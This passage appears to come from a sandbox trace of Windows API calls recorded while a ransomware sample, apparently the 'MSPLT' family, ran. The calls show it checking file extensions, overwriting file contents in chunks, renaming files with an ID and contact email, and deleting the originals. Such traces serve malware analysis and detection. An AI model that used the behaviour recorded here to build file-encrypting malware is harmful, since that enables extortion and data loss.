(lpString=".jpg") returned 4 [0174.524] lstrcmpiW (lpString1=".jpg", lpString2=".ico") returned 1 [0174.524] lstrcmpiW (lpString1=".mzz", lpString2=".MSPLT") returned 1 [0174.524] lstrlenW (lpString="netfx_Extended.mzz") returned 18 [0174.524] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Extended.mzz" (normalized: "c:\\588bce7c90097ed212\\netfx_extended.mzz"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0174.525] GetFileSizeEx (in: hFile=0x30c, lpFileSize=0x341ff14 | out: lpFileSize=0x341ff14*=43131591) returned 1 [0174.525] CloseHandle (hObject=0x30c) returned 1 [0174.525] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\netfx_Extended.mzz" (normalized: "c:\\588bce7c90097ed212\\netfx_extended.mzz")) returned 0x20 [0174.525] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\netfx_Extended.mzz.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\netfx_extended.mzz.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0174.525] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\netfx_Extended.mzz" (normalized: "c:\\588bce7c90097ed212\\netfx_extended.mzz"), lpNewFileName="C:\\588bce7c90097ed212\\netfx_Extended.mzz.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\netfx_extended.mzz.id-b4197730.[supermetasploit@aol.com].msplt")) returned 1 [0174.526] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Extended.mzz.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\netfx_extended.mzz.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0174.526] SetFilePointerEx (in: hFile=0x30c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x341fc64 | out: lpNewFilePointer=0x0) returned 1 [0174.526] SetFilePointerEx (in: hFile=0x30c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x341fc24 | out: lpNewFilePointer=0x0) returned 1 [0174.526] ReadFile (in: hFile=0x30c, lpBuffer=0x3a3c058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x341fc30, lpOverlapped=0x0 | out: lpBuffer=0x3a3c058*, lpNumberOfBytesRead=0x341fc30*=0x40000, lpOverlapped=0x0) returned 1 [0174.540] SetFilePointerEx (in: hFile=0x30c, liDistanceToMove=0xdb60ed, lpNewFilePointer=0x0, dwMoveMethod=0x341fc24 | out: lpNewFilePointer=0x0) returned 1 [0174.540] ReadFile (in: hFile=0x30c, lpBuffer=0x3a7c058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x341fc30, lpOverlapped=0x0 | out: lpBuffer=0x3a7c058*, lpNumberOfBytesRead=0x341fc30*=0x40000, lpOverlapped=0x0) returned 1 [0174.551] SetFilePointerEx (in: hFile=0x30c, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x341fc64 | out: lpNewFilePointer=0xffffffff) returned 1 [0174.551] SetFilePointerEx (in: hFile=0x30c, liDistanceToMove=0x28e22c7, lpNewFilePointer=0x0, dwMoveMethod=0x341fc24 | out: lpNewFilePointer=0x0) returned 1 [0174.551] ReadFile (in: hFile=0x30c, lpBuffer=0x3abc058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x341fc30, lpOverlapped=0x0 | out: lpBuffer=0x3abc058*, lpNumberOfBytesRead=0x341fc30*=0x40000, lpOverlapped=0x0) returned 1 [0174.572] SetFilePointerEx (in: hFile=0x30c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x341fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.572] WriteFile (in: hFile=0x30c, lpBuffer=0x3a3c020*, nNumberOfBytesToWrite=0xc0110, lpNumberOfBytesWritten=0x341fca8, lpOverlapped=0x0 | out: lpBuffer=0x3a3c020*, lpNumberOfBytesWritten=0x341fca8*=0xc0110, lpOverlapped=0x0) returned 1 [0176.370] SetEndOfFile (hFile=0x30c) returned 1 [0176.370] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x40000) returned 0x3fb82b0 [0176.383] SetFilePointerEx (in: hFile=0x30c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x341fc74 | out: lpNewFilePointer=0x0) returned 1 [0176.383] WriteFile (in: hFile=0x30c, lpBuffer=0x3fb82b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x341fc80, lpOverlapped=0x0 | out: lpBuffer=0x3fb82b0*, lpNumberOfBytesWritten=0x341fc80*=0x40000, lpOverlapped=0x0) returned 1 [0176.384] SetFilePointerEx (in: hFile=0x30c, liDistanceToMove=0xdb60ed, lpNewFilePointer=0x0, dwMoveMethod=0x341fc74 | out: lpNewFilePointer=0x0) returned 1 [0176.384] WriteFile (in: hFile=0x30c, lpBuffer=0x3fb82b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x341fc80, lpOverlapped=0x0 | out: lpBuffer=0x3fb82b0*, lpNumberOfBytesWritten=0x341fc80*=0x40000, lpOverlapped=0x0) returned 1 [0176.385] SetFilePointerEx (in: hFile=0x30c, liDistanceToMove=0x28e22c7, lpNewFilePointer=0x0, dwMoveMethod=0x341fc74 | out: lpNewFilePointer=0x0) returned 1 [0176.385] WriteFile (in: hFile=0x30c, lpBuffer=0x3fb82b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x341fc80, lpOverlapped=0x0 | out: lpBuffer=0x3fb82b0*, lpNumberOfBytesWritten=0x341fc80*=0x40000, lpOverlapped=0x0) returned 1 [0176.801] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3fb82b0 | out: hHeap=0x710000) returned 1 [0177.144] CloseHandle (hObject=0x30c) returned 1 [0187.207] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\netfx_Extended.mzz.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0187.208] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Extended.mzz") returned 40 [0187.208] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Extended.mzz") returned 40 [0187.208] lstrlenW (lpString=".doc") returned 4 [0187.208] lstrcmpiW (lpString1=".doc", lpString2=".mzz") returned -1 [0187.208] lstrlenW (lpString=".docx") returned 5 [0187.208] lstrcmpiW (lpString1=".docx", lpString2="d.mzz") returned -1 [0187.208] lstrlenW (lpString=".pdf") returned 4 [0187.208] lstrcmpiW (lpString1=".pdf", lpString2=".mzz") returned 1 [0187.208] lstrlenW (lpString=".xls") returned 4 [0187.209] lstrcmpiW (lpString1=".xls", lpString2=".mzz") returned 1 [0187.209] lstrlenW (lpString=".xlsx") returned 5 [0187.209] lstrcmpiW (lpString1=".xlsx", lpString2="d.mzz") returned -1 [0187.209] lstrlenW (lpString=".ppt") returned 4 [0187.209] lstrcmpiW (lpString1=".ppt", lpString2=".mzz") returned 1 [0187.209] lstrlenW (lpString="C:\\588bce7c90097ed212\\netfx_Extended.mzz") returned 40 [0187.209] lstrlenW (lpString=".zip") returned 4 [0187.209] lstrcmpiW (lpString1=".zip", lpString2=".mzz") returned 1 [0187.209] lstrlenW (lpString=".rar") returned 4 [0187.209] lstrcmpiW (lpString1=".rar", lpString2=".mzz") returned 1 Thread: id = 18 os_tid = 0x11c4 [0167.263] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10000) returned 0x3261248 [0167.264] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10000) returned 0x3271250 [0167.264] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10) returned 0x76afa8 [0167.264] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x6) returned 0x79d130 [0167.264] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10) returned 0x76aff0 [0167.264] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x100000) returned 0x3b47020 [0167.268] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10) returned 0x76af78 [0167.268] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x76af78, Size=0x20) returned 0x74e930 [0167.268] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10) returned 0x76af48 [0167.268] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x76af48, Size=0x20) returned 0x74e958 [0167.268] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x772d0000 [0167.268] GetProcAddress (hModule=0x772d0000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x772e6b30 [0167.268] Wow64DisableWow64FsRedirection (in: OldValue=0x355ff50 | out: OldValue=0x355ff50*=0x0) returned 1 [0167.268] lstrlenW (lpString="kernel32.dll") returned 12 [0167.268] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x74e930 | out: hHeap=0x710000) returned 1 [0167.269] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0167.269] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x74e958 | out: hHeap=0x710000) returned 1 [0167.269] Sleep (dwMilliseconds=0x64) [0167.653] lstrcmpiW (lpString1=".cmd", lpString2=".MSPLT") returned -1 [0167.653] lstrlenW (lpString="preoobe.cmd") returned 11 [0167.653] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\preoobe.cmd" (normalized: "c:\\$getcurrent\\safeos\\preoobe.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0168.001] GetFileSizeEx (in: hFile=0x2f0, lpFileSize=0x355ff14 | out: lpFileSize=0x355ff14*=74) returned 1 [0168.001] CloseHandle (hObject=0x2f0) returned 1 [0168.002] GetFileAttributesW (lpFileName="C:\\$GetCurrent\\SafeOS\\preoobe.cmd" (normalized: "c:\\$getcurrent\\safeos\\preoobe.cmd")) returned 0x20 [0168.002] GetFileAttributesW (lpFileName="C:\\$GetCurrent\\SafeOS\\preoobe.cmd.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\$getcurrent\\safeos\\preoobe.cmd.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0168.002] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\preoobe.cmd" (normalized: "c:\\$getcurrent\\safeos\\preoobe.cmd"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0168.002] SetFilePointerEx (in: hFile=0x2f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0168.002] SetFilePointerEx (in: hFile=0x2f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0168.002] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\preoobe.cmd.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\$getcurrent\\safeos\\preoobe.cmd.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0168.003] GetLastError () returned 0x0 [0168.003] ReadFile (in: hFile=0x2f0, lpBuffer=0x3b47020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b47020*, lpNumberOfBytesRead=0x355fecc*=0x4a, lpOverlapped=0x0) returned 1 [0168.021] WriteFile (in: hFile=0x2f4, lpBuffer=0x3b47020*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b47020*, lpNumberOfBytesWritten=0x355fc94*=0x50, lpOverlapped=0x0) returned 1 [0168.022] ReadFile (in: hFile=0x2f0, lpBuffer=0x3b47020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b47020*, lpNumberOfBytesRead=0x355fecc*=0x0, lpOverlapped=0x0) returned 1 [0168.023] WriteFile (in: hFile=0x2f4, lpBuffer=0x3b47020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b47020*, lpNumberOfBytesWritten=0x355fc94*=0xea, lpOverlapped=0x0) returned 1 [0168.023] SetEndOfFile (hFile=0x2f4) returned 1 [0168.023] CloseHandle (hObject=0x2f4) returned 1 [0168.024] SetFilePointerEx (in: hFile=0x2f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0168.024] SetEndOfFile (hFile=0x2f0) returned 1 [0168.025] CloseHandle (hObject=0x2f0) returned 1 [0168.025] SetFileAttributesW (lpFileName="C:\\$GetCurrent\\SafeOS\\preoobe.cmd.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0168.026] DeleteFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\preoobe.cmd" (normalized: "c:\\$getcurrent\\safeos\\preoobe.cmd")) returned 1 [0168.026] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\preoobe.cmd") returned 33 [0168.026] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\preoobe.cmd") returned 33 [0168.026] lstrlenW (lpString=".doc") returned 4 [0168.026] lstrcmpiW (lpString1=".doc", lpString2=".cmd") returned 1 [0168.026] lstrlenW (lpString=".docx") returned 5 [0168.026] lstrcmpiW (lpString1=".docx", lpString2="e.cmd") returned -1 [0168.026] lstrlenW (lpString=".pdf") returned 4 [0168.026] lstrcmpiW (lpString1=".pdf", lpString2=".cmd") returned 1 [0168.026] lstrlenW (lpString=".xls") returned 4 [0168.026] lstrcmpiW (lpString1=".xls", lpString2=".cmd") returned 1 [0168.026] lstrlenW (lpString=".xlsx") returned 5 [0168.026] lstrcmpiW (lpString1=".xlsx", lpString2="e.cmd") returned -1 [0168.026] lstrlenW (lpString=".ppt") returned 4 [0168.027] lstrcmpiW (lpString1=".ppt", lpString2=".cmd") returned 1 [0168.027] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\preoobe.cmd") returned 33 [0168.027] lstrlenW (lpString=".zip") returned 4 [0168.027] lstrcmpiW (lpString1=".zip", lpString2=".cmd") returned 1 [0168.027] lstrlenW (lpString=".rar") returned 4 [0168.027] lstrcmpiW (lpString1=".rar", lpString2=".cmd") returned 1 [0168.027] lstrlenW (lpString=".bz2") returned 4 [0168.027] lstrcmpiW (lpString1=".bz2", lpString2=".cmd") returned -1 [0168.027] lstrlenW (lpString=".7z") returned 3 [0168.027] lstrcmpiW (lpString1=".7z", lpString2="cmd") returned -1 [0168.027] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\preoobe.cmd") returned 33 [0168.027] lstrlenW (lpString=".dbf") returned 4 [0168.027] lstrcmpiW (lpString1=".dbf", lpString2=".cmd") returned 1 [0168.027] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\preoobe.cmd") returned 33 [0168.027] lstrlenW (lpString=".1cd") returned 4 [0168.027] lstrcmpiW (lpString1=".1cd", lpString2=".cmd") returned -1 [0168.027] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\preoobe.cmd") returned 33 [0168.027] lstrlenW (lpString=".jpg") returned 4 [0168.027] lstrcmpiW (lpString1=".jpg", lpString2=".cmd") returned 1 [0168.027] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\preoobe.cmd") returned 33 [0168.027] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\preoobe.cmd") returned 33 [0168.027] lstrlenW (lpString=".doc") returned 4 [0168.027] lstrcmpiW (lpString1=".doc", lpString2=".cmd") returned 1 [0168.027] lstrlenW (lpString=".docx") returned 5 [0168.027] lstrcmpiW (lpString1=".docx", lpString2="e.cmd") returned -1 [0168.027] lstrlenW (lpString=".pdf") returned 4 [0168.027] lstrcmpiW (lpString1=".pdf", lpString2=".cmd") returned 1 [0168.028] lstrlenW (lpString=".xls") returned 4 [0168.028] lstrcmpiW (lpString1=".xls", lpString2=".cmd") returned 1 [0168.028] lstrlenW (lpString=".xlsx") returned 5 [0168.028] lstrcmpiW (lpString1=".xlsx", lpString2="e.cmd") returned -1 [0168.028] lstrlenW (lpString=".ppt") returned 4 [0168.028] lstrcmpiW (lpString1=".ppt", lpString2=".cmd") returned 1 [0168.028] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\preoobe.cmd") returned 33 [0168.028] lstrlenW (lpString=".zip") returned 4 [0168.028] lstrcmpiW (lpString1=".zip", lpString2=".cmd") returned 1 [0168.028] lstrlenW (lpString=".rar") returned 4 [0168.028] lstrcmpiW (lpString1=".rar", lpString2=".cmd") returned 1 [0168.028] lstrlenW (lpString=".bz2") returned 4 [0168.028] lstrcmpiW (lpString1=".bz2", lpString2=".cmd") returned -1 [0168.028] lstrlenW (lpString=".7z") returned 3 [0168.028] lstrcmpiW (lpString1=".7z", lpString2="cmd") returned -1 [0168.028] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\preoobe.cmd") returned 33 [0168.028] lstrlenW (lpString=".dbf") returned 4 [0168.028] lstrcmpiW (lpString1=".dbf", lpString2=".cmd") returned 1 [0168.028] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\preoobe.cmd") returned 33 [0168.028] lstrlenW (lpString=".1cd") returned 4 [0168.028] lstrcmpiW (lpString1=".1cd", lpString2=".cmd") returned -1 [0168.028] lstrlenW (lpString="C:\\$GetCurrent\\SafeOS\\preoobe.cmd") returned 33 [0168.028] lstrlenW (lpString=".jpg") returned 4 [0168.028] lstrcmpiW (lpString1=".jpg", lpString2=".cmd") returned 1 [0168.029] lstrcmpiW (lpString1=".MARKER", lpString2=".MSPLT") returned -1 [0168.029] lstrlenW (lpString="$WINRE_BACKUP_PARTITION.MARKER") returned 30 [0168.029] CreateFileW (lpFileName="C:\\$WINRE_BACKUP_PARTITION.MARKER" (normalized: "c:\\$winre_backup_partition.marker"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec [0168.598] GetFileSizeEx (in: hFile=0x2ec, lpFileSize=0x355ff14 | out: lpFileSize=0x355ff14*=0) returned 1 [0168.598] CloseHandle (hObject=0x2ec) returned 1 [0168.598] lstrlenW (lpString="C:\\$WINRE_BACKUP_PARTITION.MARKER") returned 33 [0168.598] lstrlenW (lpString="C:\\$WINRE_BACKUP_PARTITION.MARKER") returned 33 [0168.598] lstrlenW (lpString=".doc") returned 4 [0168.598] lstrcmpiW (lpString1=".doc", lpString2="RKER") returned -1 [0168.598] lstrlenW (lpString=".docx") returned 5 [0168.598] lstrcmpiW (lpString1=".docx", lpString2="ARKER") returned -1 [0168.598] lstrlenW (lpString=".pdf") returned 4 [0168.598] lstrcmpiW (lpString1=".pdf", lpString2="RKER") returned -1 [0168.598] lstrlenW (lpString=".xls") returned 4 [0168.598] lstrcmpiW (lpString1=".xls", lpString2="RKER") returned -1 [0168.598] lstrlenW (lpString=".xlsx") returned 5 [0168.598] lstrcmpiW (lpString1=".xlsx", lpString2="ARKER") returned -1 [0168.598] lstrlenW (lpString=".ppt") returned 4 [0168.598] lstrcmpiW (lpString1=".ppt", lpString2="RKER") returned -1 [0168.598] lstrlenW (lpString="C:\\$WINRE_BACKUP_PARTITION.MARKER") returned 33 [0168.598] lstrlenW (lpString=".zip") returned 4 [0168.598] lstrcmpiW (lpString1=".zip", lpString2="RKER") returned -1 [0168.598] lstrlenW (lpString=".rar") returned 4 [0168.599] lstrcmpiW (lpString1=".rar", lpString2="RKER") returned -1 [0168.599] lstrlenW (lpString=".bz2") returned 4 [0168.599] lstrcmpiW (lpString1=".bz2", lpString2="RKER") returned -1 [0168.599] lstrlenW (lpString=".7z") returned 3 [0168.599] lstrcmpiW (lpString1=".7z", lpString2="KER") returned -1 [0168.599] lstrlenW (lpString="C:\\$WINRE_BACKUP_PARTITION.MARKER") returned 33 [0168.599] lstrlenW (lpString=".dbf") returned 4 [0168.599] lstrcmpiW (lpString1=".dbf", lpString2="RKER") returned -1 [0168.599] lstrlenW (lpString="C:\\$WINRE_BACKUP_PARTITION.MARKER") returned 33 [0168.599] lstrlenW (lpString=".1cd") returned 4 [0168.599] lstrcmpiW (lpString1=".1cd", lpString2="RKER") returned -1 [0168.599] lstrlenW (lpString="C:\\$WINRE_BACKUP_PARTITION.MARKER") returned 33 [0168.599] lstrlenW (lpString=".jpg") returned 4 [0168.599] lstrcmpiW (lpString1=".jpg", lpString2="RKER") returned -1 [0168.599] lstrlenW (lpString="C:\\$WINRE_BACKUP_PARTITION.MARKER") returned 33 [0168.599] lstrlenW (lpString="C:\\$WINRE_BACKUP_PARTITION.MARKER") returned 33 [0168.599] lstrlenW (lpString=".doc") returned 4 [0168.599] lstrcmpiW (lpString1=".doc", lpString2="RKER") returned -1 [0168.599] lstrlenW (lpString=".docx") returned 5 [0168.599] lstrcmpiW (lpString1=".docx", lpString2="ARKER") returned -1 [0168.599] lstrlenW (lpString=".pdf") returned 4 [0168.599] lstrcmpiW (lpString1=".pdf", lpString2="RKER") returned -1 [0168.599] lstrlenW (lpString=".xls") returned 4 [0168.599] lstrcmpiW (lpString1=".xls", lpString2="RKER") returned -1 [0168.599] lstrlenW (lpString=".xlsx") returned 5 [0168.599] lstrcmpiW (lpString1=".xlsx", lpString2="ARKER") returned -1 [0168.599] lstrlenW (lpString=".ppt") returned 4 [0168.599] lstrcmpiW (lpString1=".ppt", lpString2="RKER") returned -1 [0168.599] lstrlenW (lpString="C:\\$WINRE_BACKUP_PARTITION.MARKER") returned 33 [0168.599] lstrlenW (lpString=".zip") returned 4 [0168.599] lstrcmpiW (lpString1=".zip", lpString2="RKER") returned -1 [0168.600] lstrlenW (lpString=".rar") returned 4 [0168.600] lstrcmpiW (lpString1=".rar", lpString2="RKER") returned -1 [0168.600] lstrlenW (lpString=".bz2") returned 4 [0168.600] lstrcmpiW (lpString1=".bz2", lpString2="RKER") returned -1 [0168.600] lstrlenW (lpString=".7z") returned 3 [0168.600] lstrcmpiW (lpString1=".7z", lpString2="KER") returned -1 [0168.600] lstrlenW (lpString="C:\\$WINRE_BACKUP_PARTITION.MARKER") returned 33 [0168.600] lstrlenW (lpString=".dbf") returned 4 [0168.600] lstrcmpiW (lpString1=".dbf", lpString2="RKER") returned -1 [0168.600] lstrlenW (lpString="C:\\$WINRE_BACKUP_PARTITION.MARKER") returned 33 [0168.600] lstrlenW (lpString=".1cd") returned 4 [0168.600] lstrcmpiW (lpString1=".1cd", lpString2="RKER") returned -1 [0168.600] lstrlenW (lpString="C:\\$WINRE_BACKUP_PARTITION.MARKER") returned 33 [0168.600] lstrlenW (lpString=".jpg") returned 4 [0168.600] lstrcmpiW (lpString1=".jpg", lpString2="RKER") returned -1 [0168.600] Sleep (dwMilliseconds=0x64) [0169.029] Sleep (dwMilliseconds=0x64) [0169.348] lstrcmpiW (lpString1=".dll", lpString2=".MSPLT") returned -1 [0169.348] lstrlenW (lpString="SetupResources.dll") returned 18 [0169.348] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1030\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1030\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0169.349] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x355ff14 | out: lpFileSize=0x355ff14*=18264) returned 1 [0169.350] CloseHandle (hObject=0x300) returned 1 [0169.350] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1030\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1030\\setupresources.dll")) returned 0x80 [0169.350] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1030\\SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1030\\setupresources.dll.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0169.350] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1030\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1030\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0169.350] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0169.350] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0169.350] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1030\\SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\588bce7c90097ed212\\1030\\setupresources.dll.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d4 [0169.351] GetLastError () returned 0x0 [0169.351] ReadFile (in: hFile=0x300, lpBuffer=0x3b47020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b47020*, lpNumberOfBytesRead=0x355fecc*=0x4758, lpOverlapped=0x0) returned 1 [0169.353] WriteFile (in: hFile=0x2d4, lpBuffer=0x3b47020*, nNumberOfBytesToWrite=0x4760, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b47020*, lpNumberOfBytesWritten=0x355fc94*=0x4760, lpOverlapped=0x0) returned 1 [0169.355] ReadFile (in: hFile=0x300, lpBuffer=0x3b47020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x355fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b47020*, lpNumberOfBytesRead=0x355fecc*=0x0, lpOverlapped=0x0) returned 1 [0169.355] WriteFile (in: hFile=0x2d4, lpBuffer=0x3b47020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x355fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b47020*, lpNumberOfBytesWritten=0x355fc94*=0xf8, lpOverlapped=0x0) returned 1 [0169.355] SetEndOfFile (hFile=0x2d4) returned 1 [0169.356] CloseHandle (hObject=0x2d4) returned 1 [0169.360] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x355fec0 | out: lpNewFilePointer=0x0) returned 1 [0169.360] SetEndOfFile (hFile=0x300) returned 1 [0169.361] CloseHandle (hObject=0x300) returned 1 [0169.362] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1030\\SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x80) returned 1 [0169.362] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1030\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1030\\setupresources.dll")) returned 1 [0169.362] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\SetupResources.dll") returned 45 [0169.362] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\SetupResources.dll") returned 45 [0169.362] lstrlenW (lpString=".doc") returned 4 [0169.362] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0169.362] lstrlenW (lpString=".docx") returned 5 [0169.362] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0169.362] lstrlenW (lpString=".pdf") returned 4 [0169.363] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0169.363] lstrlenW (lpString=".xls") returned 4 [0169.363] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0169.363] lstrlenW (lpString=".xlsx") returned 5 [0169.363] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0169.363] lstrlenW (lpString=".ppt") returned 4 [0169.363] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0169.363] lstrlenW (lpString="C:\\588bce7c90097ed212\\1030\\SetupResources.dll") returned 45 [0169.363] lstrlenW (lpString=".zip") returned 4 [0169.363] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0169.363] lstrlenW (lpString=".rar") returned 4 [0169.363] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0169.363] lstrlenW (lpString=".bz2") returned 4 [0169.363] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned 